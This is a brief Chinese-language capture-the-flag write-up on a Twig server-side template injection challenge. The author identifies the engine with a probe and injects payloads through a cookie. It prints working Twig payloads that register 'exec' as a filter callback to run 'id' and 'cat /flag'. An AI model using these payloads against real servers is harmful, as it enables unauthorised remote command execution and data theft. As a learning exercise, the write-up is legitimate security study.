打开题目环境,一开始考虑是sql注入,但是发现输入什么都会回显输入的数据。
这时候考虑是不是模板注入了。根据hint,注入点存在于cookie中。
{{7*'7'}} 回显7777777 ==> Jinja2
{{7*'7'}} 回显49 ==> Twig
将cookie中的UM_distinctid去掉,添加payload
根据回显结果判断是twig模板引擎,打上payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
拿到flag
第一次做到ssti注入的题目,对于paylaod的理解还是很模糊。